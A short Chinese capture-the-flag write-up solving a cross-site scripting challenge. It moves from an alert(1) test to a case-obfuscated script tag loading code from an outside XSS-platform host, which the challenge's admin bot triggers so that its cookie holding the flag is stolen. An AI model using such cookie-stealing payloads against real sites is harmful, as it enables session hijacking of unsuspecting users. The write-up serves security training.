点击此处获得更好的阅读体验
来源
来自jazz499原创投稿
题目考点
JavaScript基础
XSS平台
解题思路
XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行
直接在What's your name表单中插入测试语句
1 | <script>alert(1)</script> |
弹框:1
下面来分析一下为什么会执行弹窗呢,右键查看源代码,发现以下代码
1 | <div> |
输入的<script>alert(1)</script>在页面上输入了
而<script>标签中的alert语句则被html正常解析执行弹窗
在xss平台(如xss.pt)中创建项目,获得js代码如下
1 | <sCRiPt sRC=//xss.pt/1234></sCrIpT> |
在第二个表单中发送给后台的bot让其遭受xss攻击(实际上是模拟管理员点击了恶意xss链接盗取cookie)
xss平台的cookie中返回flag字符串